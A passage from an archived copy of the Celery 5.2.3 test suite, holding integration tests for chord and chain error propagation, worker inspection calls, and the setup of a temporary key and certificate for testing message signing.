NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord(group(add.s(1, 2), add.s(3, 4)), tsum.s()) c2 = chord(group(add.s(1, 2), add.s(3, 4)), tsum.s()) g = group(c1, c2) r = g.delay() assert r.get(timeout=TIMEOUT) == [10, 10] @flaky def test_chord_in_chords_with_chains(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chord( group([ chain( add.si(1, 2), chord( group([add.si(1, 2), add.si(1, 2)]), add.si(1, 2), ), ), chain( add.si(1, 2), chord( group([add.si(1, 2), add.si(1, 2)]), add.si(1, 2), ), ), ]), add.si(2, 2) ) r = c.delay() assert r.get(timeout=TIMEOUT) == 4 @flaky def test_chain_chord_chain_chord(self, manager): # test for #2573 try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chain( identity.si(1), chord( [ identity.si(2), chain( identity.si(3), chord( [identity.si(4), identity.si(5)], identity.si(6) ) ) ], identity.si(7) ) ) res = c.delay() assert res.get(timeout=TIMEOUT) == 7 @pytest.mark.xfail(reason="Issue #6176") def test_chord_in_chain_with_args(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chain( chord( [identity.s(), identity.s()], identity.s(), ), identity.s(), ) res1 = c1.apply_async(args=(1,)) assert res1.get(timeout=TIMEOUT) == [1, 1] res1 = c1.apply(args=(1,)) assert res1.get(timeout=TIMEOUT) == [1, 1] @pytest.mark.xfail(reason="Issue #6200") def test_chain_in_chain_with_args(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chain( # NOTE: This chain should have only 1 chain inside it chain( identity.s(), identity.s(), ), ) res1 = c1.apply_async(args=(1,)) assert res1.get(timeout=TIMEOUT) == 1 res1 = c1.apply(args=(1,)) assert res1.get(timeout=TIMEOUT) == 1 @flaky def test_large_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(identity.si(i) for i in range(1000)) | tsum.s() res = c.delay() assert res.get(timeout=TIMEOUT) == 499500 @flaky def test_chain_to_a_chord_with_large_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = identity.si(1) | group( identity.s() for _ in range(1000)) | tsum.s() res = c.delay() assert res.get(timeout=TIMEOUT) == 1000 @flaky def test_priority(self, manager): c = chain(return_priority.signature(priority=3))() assert c.get(timeout=TIMEOUT) == "Priority: 3" @flaky def test_priority_chain(self, manager): c = return_priority.signature(priority=3) | return_priority.signature( priority=5) assert c().get(timeout=TIMEOUT) == "Priority: 5" def test_nested_chord_group(self, manager): """ Confirm that groups nested inside chords get unrolled. """ try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chord( ( group(identity.s(42), identity.s(42)), # [42, 42] ), identity.s() # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chord_group_chain_group_tail(self, manager): """ Sanity check that a deeply nested group is completed as expected. Groups at the end of chains nested in chords have had issues and this simple test sanity check that such a task structure can be completed. """ try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chord( group( chain( identity.s(42), # 42 group( identity.s(), # 42 identity.s(), # 42 ), # [42, 42] ), # [42, 42] ), # [[42, 42]] since the chain prevents unrolling identity.s(), # [[42, 42]] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [[42, 42]] @pytest.mark.xfail(TEST_BACKEND.startswith('redis://'), reason="Issue #6437") def test_error_propagates_from_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = add.s(1, 1) | fail.s() | group(add.s(1), add.s(1)) res = sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_error_propagates_from_chord2(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = add.s(1, 1) | add.s(1) | group(add.s(1), fail.s()) res = sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_error_propagates_to_chord_from_simple(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_simple( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple header task fails" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple body task fails" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_simple( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple header task fails" ): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple body task fails" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_chain(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = chain(identity.si(42), fail.s(), identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_chain( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = chain(identity.si(42), fail.s(), identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails before the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails before the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_chain( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = chain(identity.si(42), fail_sig, identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails before the end" ): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails before the end" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_chain_tail(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = chain(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test( msg="Error propagates from body chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_chain_tail( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = chain(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from body chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails at the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_chain_tail( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = chain(identity.si(42), fail_sig) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_group(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = group(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_group( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = group(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_group( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = group(identity.si(42), fail_sig) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_immutable_errback_called_by_chord_from_group_fail_multiple( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() fail_task_count = 42 redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) # Include a mix of passing and failing tasks child_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *(fail.s() for _ in range(fail_task_count)), ) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from header group"): redis_connection.delete(redis_key) res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): # NOTE: Here we only expect the errback to be called once since it # is attached to the chord body which is a single task! await_redis_count(1, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): # NOTE: Here we expect the errback to be called once per failing # task in the chord body since it is a group await_redis_count(fail_task_count, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_group_fail_multiple( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() fail_task_count = 42 # We have to use failing task signatures with unique task IDs to ensure # the chord can complete when they are used as part of its header! fail_sigs = tuple( fail.s() for _ in range(fail_task_count) ) fail_sig_ids = tuple(s.freeze().id for s in fail_sigs) errback = errback_task.s() # Include a mix of passing and failing tasks child_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *fail_sigs, ) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): # NOTE: Here we only expect the errback to be called once since it # is attached to the chord body which is a single task! await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) for fail_sig_id in fail_sig_ids: redis_connection.delete(fail_sig_id) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): # NOTE: Here we expect the errback to be called once per failing # task in the chord body since it is a group, and each task has a # unique task ID for i, fail_sig_id in enumerate(fail_sig_ids): await_redis_count( 1, redis_key=fail_sig_id, # After the first one is seen, check the rest with no # timeout since waiting to confirm that each one doesn't # get over-incremented will take a long time timeout=TIMEOUT if i == 0 else 0, ) for fail_sig_id in fail_sig_ids: redis_connection.delete(fail_sig_id) def test_chord_header_task_replaced_with_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( replace_with_chain.si(42), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_header_child_replaced_with_chain_first(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (replace_with_chain.si(42), identity.s(1337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_chord_header_child_replaced_with_chain_middle(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (identity.s(42), replace_with_chain.s(1337), identity.s(31337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337] def test_chord_header_child_replaced_with_chain_last(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (identity.s(42), replace_with_chain.s(1337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_chord_body_task_replaced_with_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), replace_with_chain.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_first(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(replace_with_chain.s(), identity.s(), ), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_middle(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(identity.s(), replace_with_chain.s(), identity.s(), ), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_last(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(identity.s(), replace_with_chain.s(), ), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] class test_signature_serialization: """ Confirm nested signatures can be rebuilt after passing through a backend. These tests are expected to finish and return `None` or raise an exception in the error case. The exception indicates that some element of a nested signature object was not properly deserialized from its dictionary representation, and would explode later on if it were used as a signature. """ def test_rebuild_nested_chain_chain(self, manager): sig = chain( tasks.return_nested_signature_chain_chain.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_chain_group(self, manager): sig = chain( tasks.return_nested_signature_chain_group.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_chain_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( tasks.return_nested_signature_chain_chord.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_group_chain(self, manager): sig = chain( tasks.return_nested_signature_group_chain.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_group_group(self, manager): sig = chain( tasks.return_nested_signature_group_group.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_group_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( tasks.return_nested_signature_group_chord.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_chord_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( tasks.return_nested_signature_chord_chain.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_chord_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( tasks.return_nested_signature_chord_group.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) def test_rebuild_nested_chord_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( tasks.return_nested_signature_chord_chord.s(), tasks.rebuild_signature.s() ) sig.delay().get(timeout=TIMEOUT) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_inspect.py0000664000175000017500000001715500000000000020552 0ustar00asifasif00000000000000import os import re from datetime import datetime, timedelta from time import sleep from unittest.mock import ANY import pytest from celery.utils.nodenames import anon_nodename from .tasks import add, sleeping NODENAME = anon_nodename() _flaky = pytest.mark.flaky(reruns=5, reruns_delay=2) _timeout = pytest.mark.timeout(timeout=300) def flaky(fn): return _timeout(_flaky(fn)) @pytest.fixture() def inspect(manager): return manager.app.control.inspect() class test_Inspect: """Integration tests fo app.control.inspect() API""" @flaky def test_ping(self, inspect): """Tests pinging the worker""" ret = inspect.ping() assert len(ret) == 1 assert ret[NODENAME] == {'ok': 'pong'} # TODO: Check ping() is returning None after stopping worker. # This is tricky since current test suite does not support stopping of # the worker. @flaky def test_clock(self, inspect): """Tests getting clock information from worker""" ret = inspect.clock() assert len(ret) == 1 assert ret[NODENAME]['clock'] > 0 @flaky def test_registered(self, inspect): """Tests listing registered tasks""" # TODO: We can check also the exact values of the registered methods ret = inspect.registered() assert len(ret) == 1 len(ret[NODENAME]) > 0 for task_name in ret[NODENAME]: assert isinstance(task_name, str) ret = inspect.registered('name') for task_info in ret[NODENAME]: # task_info is in form 'TASK_NAME [name=TASK_NAME]' assert re.fullmatch(r'\S+ \[name=\S+\]', task_info) @flaky def test_active_queues(self, inspect): """Tests listing active queues""" ret = inspect.active_queues() assert len(ret) == 1 assert ret[NODENAME] == [ { 'alias': None, 'auto_delete': False, 'binding_arguments': None, 'bindings': [], 'consumer_arguments': None, 'durable': True, 'exchange': { 'arguments': None, 'auto_delete': False, 'delivery_mode': None, 'durable': True, 'name': 'celery', 'no_declare': False, 'passive': False, 'type': 'direct' }, 'exclusive': False, 'expires': None, 'max_length': None, 'max_length_bytes': None, 'max_priority': None, 'message_ttl': None, 'name': 'celery', 'no_ack': False, 'no_declare': None, 'queue_arguments': None, 'routing_key': 'celery'} ] @flaky def test_active(self, inspect): """Tests listing active tasks""" res = sleeping.delay(5) sleep(1) ret = inspect.active() assert len(ret) == 1 assert ret[NODENAME] == [ { 'id': res.task_id, 'name': 't.integration.tasks.sleeping', 'args': [5], 'kwargs': {}, 'type': 't.integration.tasks.sleeping', 'hostname': ANY, 'time_start': ANY, 'acknowledged': True, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, 'worker_pid': ANY } ] @flaky def test_scheduled(self, inspect): """Tests listing scheduled tasks""" exec_time = datetime.utcnow() + timedelta(seconds=5) res = add.apply_async([1, 2], {'z': 3}, eta=exec_time) ret = inspect.scheduled() assert len(ret) == 1 assert ret[NODENAME] == [ { 'eta': exec_time.strftime('%Y-%m-%dT%H:%M:%S.%f') + '+00:00', 'priority': 6, 'request': { 'id': res.task_id, 'name': 't.integration.tasks.add', 'args': [1, 2], 'kwargs': {'z': 3}, 'type': 't.integration.tasks.add', 'hostname': ANY, 'time_start': None, 'acknowledged': False, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, 'worker_pid': None } } ] @flaky def test_query_task(self, inspect): """Task that does not exist or is finished""" ret = inspect.query_task('d08b257e-a7f1-4b92-9fea-be911441cb2a') assert len(ret) == 1 assert ret[NODENAME] == {} # Task in progress res = sleeping.delay(5) sleep(1) ret = inspect.query_task(res.task_id) assert len(ret) == 1 assert ret[NODENAME] == { res.task_id: [ 'active', { 'id': res.task_id, 'name': 't.integration.tasks.sleeping', 'args': [5], 'kwargs': {}, 'type': 't.integration.tasks.sleeping', 'hostname': NODENAME, 'time_start': ANY, 'acknowledged': True, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, # worker is running in the same process as separate thread 'worker_pid': ANY } ] } @flaky def test_stats(self, inspect): """tests fetching statistics""" ret = inspect.stats() assert len(ret) == 1 assert ret[NODENAME]['pool']['max-concurrency'] == 1 assert len(ret[NODENAME]['pool']['processes']) == 1 assert ret[NODENAME]['uptime'] > 0 # worker is running in the same process as separate thread assert ret[NODENAME]['pid'] == os.getpid() @flaky def test_report(self, inspect): """Tests fetching report""" ret = inspect.report() assert len(ret) == 1 assert ret[NODENAME] == {'ok': ANY} @flaky def test_revoked(self, inspect): """Testing revoking of task""" # Fill the queue with tasks to fill the queue for _ in range(4): sleeping.delay(2) # Execute task and revoke it result = add.apply_async((1, 1)) result.revoke() ret = inspect.revoked() assert len(ret) == 1 assert result.task_id in ret[NODENAME] @flaky def test_conf(self, inspect): """Tests getting configuration""" ret = inspect.conf() assert len(ret) == 1 assert ret[NODENAME]['worker_hijack_root_logger'] == ANY assert ret[NODENAME]['worker_log_color'] == ANY assert ret[NODENAME]['accept_content'] == ANY assert ret[NODENAME]['enable_utc'] == ANY assert ret[NODENAME]['timezone'] == ANY assert ret[NODENAME]['broker_url'] == ANY assert ret[NODENAME]['result_backend'] == ANY assert ret[NODENAME]['broker_heartbeat'] == ANY assert ret[NODENAME]['deprecated_settings'] == ANY assert ret[NODENAME]['include'] == ANY ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_security.py0000664000175000017500000000660300000000000020750 0ustar00asifasif00000000000000import datetime import os import tempfile import pytest from cryptography import x509 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.x509.oid import NameOID from .tasks import add class test_security: @pytest.fixture(autouse=True, scope='class') def class_certs(self, request): self.tmpdir = tempfile.mkdtemp() self.key_name = 'worker.key' self.cert_name = 'worker.pem' key = self.gen_private_key() cert = self.gen_certificate(key=key, common_name='celery cecurity integration') pem_key = key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() ) pem_cert = cert.public_bytes( encoding=serialization.Encoding.PEM, ) with open(self.tmpdir + '/' + self.key_name, 'wb') as key: key.write(pem_key) with open(self.tmpdir + '/' + self.cert_name, 'wb') as cert: cert.write(pem_cert) request.cls.tmpdir = self.tmpdir request.cls.key_name = self.key_name request.cls.cert_name = self.cert_name yield os.remove(self.tmpdir + '/' + self.key_name) os.remove(self.tmpdir + '/' + self.cert_name) os.rmdir(self.tmpdir) @pytest.fixture(autouse=True) def _prepare_setup(self, manager): manager.app.conf.update( security_key=f'{self.tmpdir}/{self.key_name}', security_certificate=f'{self.tmpdir}/{self.cert_name}', security_cert_store=f'{self.tmpdir}/*.pem', task_serializer='auth', event_serializer='auth', accept_content=['auth'], result_accept_content=['json'] ) manager.app.setup_security() def gen_private_key(self): """generate a private key with cryptography""" return rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend(), ) def gen_certificate(self, key, common_name, issuer=None, sign_key=None): """generate a certificate with cryptography""" now = datetime.datetime.utcnow() certificate = x509.CertificateBuilder().subject_name( x509.Name([ 